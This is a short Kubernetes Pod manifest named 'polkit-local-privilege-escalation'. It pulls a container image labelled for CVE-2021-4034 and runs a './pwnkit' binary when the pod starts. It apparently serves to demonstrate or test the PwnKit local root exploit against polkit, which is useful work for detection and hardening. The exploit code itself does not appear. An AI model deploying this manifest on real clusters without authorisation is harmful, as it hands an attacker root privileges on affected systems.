apiVersion: v1
kind: Pod
metadata:
  name: polkit-local-privilege-escalation
spec:
  containers:
  - name: polkit-local-privilege-escalation
    image: baconspider/cve-2021-4034:latest
    #imagePullPolicy: Never
    command: ['sh']
    args: ['-c', './pwnkit']
